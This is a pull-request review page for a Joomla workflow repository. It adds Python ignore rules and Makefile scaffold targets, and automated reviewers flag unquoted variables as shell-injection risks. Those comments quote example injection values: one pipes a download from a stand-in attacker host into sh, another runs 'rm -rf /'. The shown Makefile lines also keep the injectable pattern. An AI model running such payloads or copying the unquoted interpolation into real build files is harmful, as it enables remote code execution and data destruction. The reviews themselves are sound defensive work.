Improve Joomla development workflows and convert scripts to Python #31

Merged
Copilot merged 8 commits from copilot/improve-joomla-development-workflow into main 2026-01-04 05:34:19 +00:00
4 changed files with 65 additions and 1 deletions
Showing only changes of commit 64f4b959f8 - Show all commits

30
.gitignore vendored

@@ -793,6 +793,36 @@ package-lock.json
.phpunit.result.cache .phpunit.result.cache
codeception.phar codeception.phar
# Python
__pycache__/
*.py[cod]
*$py.class
*.so
.Python
build/
develop-eggs/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
.pytest_cache/
.coverage
.coverage.*
htmlcov/
.tox/
.nox/
*.cover
.hypothesis/
# ============================================================ # ============================================================
# Keep-empty folders helper # Keep-empty folders helper
# ============================================================ # ============================================================


@@ -179,8 +179,42 @@ list-scripts:
@echo "Available fix scripts:" @echo "Available fix scripts:"
@find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort @find scripts/fix -type f -name "*.sh" -exec basename {} \; | sort
@echo "" @echo ""
@echo "Available run scripts:" @echo "Available run scripts (bash):"
@find scripts/run -type f -name "*.sh" -exec basename {} \; | sort @find scripts/run -type f -name "*.sh" -exec basename {} \; | sort
@echo ""
@echo "Available run scripts (python):"
@find scripts/run -type f -name "*.py" -exec basename {} \; | sort
## scaffold: Create new Joomla extension scaffolding
scaffold:
@echo "Create new Joomla extension scaffolding"
@echo ""
@echo "Usage: make scaffold TYPE=<type> NAME=<name> AUTHOR=<author> DESC=<description>"
@echo ""
@echo "Types: component, module, plugin, template, package"
@echo ""
@echo "Example:"
@echo " make scaffold TYPE=module NAME='My Module' AUTHOR='John Doe' DESC='Module description'"
## scaffold-component: Create a component
scaffold-component:
@python3 scripts/run/scaffold_extension.py component "$(NAME)" "$(DESC)" "$(AUTHOR)"
## scaffold-module: Create a module
scaffold-module:
@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client $(CLIENT)
## scaffold-plugin: Create a plugin
scaffold-plugin:
@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group $(GROUP)
copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:48 +00:00 (Migrated from github.com)
Review

The 'scaffold-module' and 'scaffold-plugin' targets reference variables 'CLIENT' and 'GROUP' respectively, but these variables don't have default values. If a user runs these targets without specifying the variables (e.g., 'make scaffold-module NAME="Test"'), the command will pass empty values to the Python script. Consider adding default values (e.g., 'CLIENT ?= site' and 'GROUP ?= system') or documenting that these must be provided.

copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:51 +00:00 (Migrated from github.com)
Review

In the scaffold-module target, the $(CLIENT) variable is interpolated into the shell command without quoting (--client $(CLIENT)), which allows shell metacharacters in CLIENT to break out of the intended argument and execute arbitrary commands (e.g. CLIENT="site; curl https://attacker/... | sh"). If an attacker can influence CLIENT (via environment variables or make arguments in an automated context), running make scaffold-module results in remote code execution under the developer's account. Treat CLIENT as untrusted and ensure it is safely passed as data (for example by quoting it and avoiding any expansion that lets the shell interpret its contents as additional arguments or commands).

	@python3 scripts/run/scaffold_extension.py module "$(NAME)" "$(DESC)" "$(AUTHOR)" --client "$(CLIENT)"

## scaffold-plugin: Create a plugin
scaffold-plugin:
	@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)"
copilot-pull-request-reviewer[bot] commented 2026-01-04 05:38:52 +00:00 (Migrated from github.com)
Review

In the scaffold-plugin target, the $(GROUP) variable is used unquoted in the shell command (--group $(GROUP)), so a malicious value containing shell metacharacters can inject extra arguments or commands (e.g. GROUP="system; rm -rf /"). If GROUP is influenced by external input (environment variables, wrapper scripts, or CI parameters), invoking make scaffold-plugin can lead to arbitrary command execution. Treat GROUP as untrusted input and ensure it is safely handled (for example by quoting it so the shell cannot interpret its contents beyond a single argument).

	@python3 scripts/run/scaffold_extension.py plugin "$(NAME)" "$(DESC)" "$(AUTHOR)" --group "$(GROUP)"
## scaffold-template: Create a template
scaffold-template:
@python3 scripts/run/scaffold_extension.py template "$(NAME)" "$(DESC)" "$(AUTHOR)"
## scaffold-package: Create a package
scaffold-package:
@python3 scripts/run/scaffold_extension.py package "$(NAME)" "$(DESC)" "$(AUTHOR)"
## docs: Open documentation ## docs: Open documentation
docs: docs:
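Review bot: In all five new `scaffold-*` recipes, `"$(NAME)"`, `"$(DESC)"` and `"$(AUTHOR)"` are expanded by make before the shell parses the line, so the double quotes only hold when the value itself contains no `"`, backtick or `$`; a value with those characters is parsed as shell syntax instead of being passed as one argument. Passing the values through the environment keeps them as data: add `export NAME DESC AUTHOR` and reference shell variables in the recipe, e.g. `@python3 scripts/run/scaffold_extension.py component "$$NAME" "$$DESC" "$$AUTHOR"`, with the same form in the other four targets. The recipes also run with an empty NAME, so a first recipe line such as `$(if $(strip $(NAME)),,$(error NAME is required))` would fail early instead of handing an empty string to the script. Whether the new targets are listed in `.PHONY` is not visible in this hunk and should be confirmed.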